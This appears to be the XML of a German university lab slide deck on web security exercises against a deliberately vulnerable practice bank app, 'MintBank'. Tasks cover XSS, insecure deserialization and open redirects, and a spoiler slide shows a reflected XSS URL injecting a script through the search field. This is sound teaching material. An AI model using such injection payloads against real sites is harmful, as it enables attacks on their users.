            <a:endParaRPr lang="de-AT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958485-53E3-4441-996B-C3D3F14D7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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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D220DC-461F-4433-85C0-6D38DE26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4DF68F-D00F-4619-AEA2-F2493E95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6</a:t>
            </a:fld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B75EA5F-ADCB-4229-AEF9-9048335809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Finde eine Möglichkeit, jemanden auf eine nicht lokale Seite weiterzuleiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Name des Flags: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>invalid_redirect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Finde die Datei meeting-2018.12.21.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Flag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100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6D4D62-5532-45B6-BCF2-EFF922D7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MintBank</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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52F9EC-D24E-41C6-8A3C-9FAD02B9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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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69AA14-979C-4AD2-BCE4-22A47FC2D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363DBD-ABF3-4ACF-B7A2-D562B2D9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7</a:t>
            </a:fld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2B2FA36-C8DF-4B33-8A2F-88AFA6B390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MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> ist unter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://5.196.132.7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> erreichbar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Alle E-Mails werden an das Postfach in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://5.196.132.7:1080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> gesendet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Rechne damit, dass der Server öfters neugestartet und zurückgesetzt werden wird!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45161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9C9CB14-E9DC-C1BF-B4F2-F1AA3416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Achtung! Ab hier folgen Spoiler!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855D2D1-D487-A357-BEB2-3704AEC5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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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568390-E1F8-0F0F-7BE7-DB92D579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1F8752-E22F-A636-3CE5-CBC70845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26669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D6C4D0C-4A25-439B-F25B-3B847ADF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Cross-Site Scripting (XSS)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2D8990-3074-5F0B-FC4F-77EF2EA7E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251-AC05-408B-8D6A-D08A9B57A344}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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B6A4D0-BF2B-9345-826D-AA44B2D3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E97E14-9518-AEE9-8C9E-DC2A0A168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pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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B861531-0EB3-01E6-6D6B-48156D4F84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600" y="1527175"/>
            <a:ext cx="3669145" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0"/>
              <a:t>Es gibt mehrere Möglichkeiten, JavaScript in die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1"/>
              <a:t>MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0"/>
              <a:t> zu injizieren:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>Über die Suche: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://5.196.132.7/PortalSearch?SearchString=%3Cscript%3Ealert%28%22XSS+Attack%21%22%29%3B%3C%2Fscript%3E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>Über „Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0" err="1"/>
              <a:t>transaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0"/>
              <a:t>Teste beide Möglichkeiten aus. Führe einen beliebigen JS-Befehl aus und binde ein Bild einer süßen Katze ein.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="144000" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" sz="12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2AC8B86-261D-CE19-4740-74F8130C2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623" y="651682"/>
            <a:ext cx="2377121" cy="404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784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LANGUAGE" val="German Austria"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="FH Salzburg Lehre DE">
  <a:themeElements>
    <a:clrScheme name="FHS">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="A0A0A0"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F5F5F5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A5D2A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F5A073"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFEB64"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="A0B4CD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A0A0A0"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D2D2D2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="000000"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="A0A0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ile Körpe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aesentation_Lehre_DE_V03.potx" id="{67AE8ED6-E306-434E-BFFF-1C3EA048DD27}" vid="{EB992524-63FE-4852-A974-EDA6D1E394E7}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="FH Salzburg Lehre DE Studiengänge">
  <a:themeElements>
    <a:clrScheme name="FHS">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="A0A0A0"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F5F5F5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A5D2A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F5A073"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFEB64"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="A0B4CD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A0A0A0"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D2D2D2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="000000"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="A0A0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ile Körpe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aesentation_Lehre_DE_V03.potx" id="{67AE8ED6-E306-434E-BFFF-1C3EA048DD27}" vid="{6CD093F8-7A79-49CB-9583-866F2B2A36DD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D0E6F45E76B5B45A2B2CCA5A2964310" ma:contentTypeVersion="7" ma:contentTypeDescription="Ein neues Dokument erstellen." ma:contentTypeScope="" ma:versionID="eb34ff0b44a78f2312939e8312c861ab">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d5eed7b5-e4dd-4b23-b0f0-2bca503224bb" xmlns:ns3="b893badd-9daf-4ab3-b3c7-c0a5712992b0" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="67178f8aa707731d67536d83b27dd605" ns2:_="" ns3:_="">
    <xsd:import namespace="d5eed7b5-e4dd-4b23-b0f0-2bca503224bb"/>
    <xsd:import namespace="b893badd-9daf-4ab3-b3c7-c0a5712992b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eed7b5-e4dd-4b23-b0f0-2bca503224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93badd-9daf-4ab3-b3c7-c0a5712992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984197-3066-44EC-A68A-A813835C46FD}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0302031C-D3E6-43B2-9D2A-FA00F73867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8F7E16-FB87-42B9-AB7A-98B8F33605A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Praesentation_Lehre_DE</Template>
  <TotalTime>0</TotalTime>
  <Words>971</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Bildschirmpräsentation (16:9)</PresentationFormat>
  <Paragraphs>150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Consolas</vt:lpstr>
      <vt:lpstr>FH Salzburg Lehre DE</vt:lpstr>
      <vt:lpstr>FH Salzburg Lehre DE Studiengänge</vt:lpstr>
      <vt:lpstr>MINT-Lab Softwareentwicklung 4. Semester</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Weitere Aufgaben</vt:lpstr>
      <vt:lpstr>Die MintBank</vt:lpstr>
      <vt:lpstr>Achtung! Ab hier folgen Spoiler!</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Weitere Aufgaben (Invalid Redirect)</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Fachhochschule Salzburg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Harald Schmuck</dc:creator>
  <cp:lastModifiedBy>Georg Schäfer</cp:lastModifiedBy>
  <cp:revision>71</cp:revision>
  <cp:lastPrinted>2017-08-24T21:21:44Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-15T06:41:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-10T12:09:21Z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0x0101006D0E6F45E76B5B45A2B2CCA5A2964310</vt:lpwstr>
  </property>
</Properties>
</file>